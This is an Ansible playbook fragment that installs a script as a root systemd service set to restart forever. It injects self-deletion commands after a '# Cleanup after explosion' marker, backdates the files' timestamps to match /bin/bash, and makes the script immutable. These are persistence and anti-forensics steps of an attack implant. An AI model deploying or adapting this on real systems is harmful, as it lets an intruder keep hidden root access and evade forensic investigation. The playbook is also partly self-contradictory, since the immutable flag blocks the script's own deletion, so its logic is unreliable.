---
- name: Define variables for paths and filenames
  set_fact:
    script_path: "/bin/doubletap3"
    service_name: "DoubleTapScript"
    service_description: "Double Tap Script"

- name: Copy shell script to target system
  copy:
    src: "files/doubletap.sh"
    dest: "{{ script_path }}"
    mode: "0755"

- name: Create systemd service to execute script
  copy:
    dest: "/etc/systemd/system/{{ service_name }}.service"
    content: |
      [Unit]
      Description={{ service_description }}
      After=network.target

      [Service]
      ExecStart={{ script_path }}
      Restart=always
      RestartSec=60
      User=root

      [Install]
      WantedBy=multi-user.target

- name: Reload systemd to recognize new service
  systemd:
    daemon_reload: yes

- name: Enable and start the new service
  systemd:
    name: "{{ service_name }}"
    enabled: yes
    state: started

- name: Add command to delete the script after execution
  lineinfile:
    path: "{{ script_path }}"
    line: "rm -f {{ script_path }}"
    insertafter: "# Cleanup after explosion"

- name: Add command to delete the service before script self-deletion
  lineinfile:
    path: "{{ script_path }}"
    line: "systemctl stop {{ service_name }} && systemctl disable {{ service_name }} && rm -f /etc/systemd/system/{{ service_name }}.service && systemctl daemon-reload"
    insertafter: "# Cleanup after explosion"

- name: Timestomp the systemd service file
  command: touch -r /bin/bash /etc/systemd/system/{{ service_name }}.service

- name: Timestomp script to match /bin/bash creation time
  command: touch -r /bin/bash {{ script_path }}

# TODO check that this should go after timestomp
- name: Set immutable attribute on script
  command: "chattr +i {{ script_path }}"
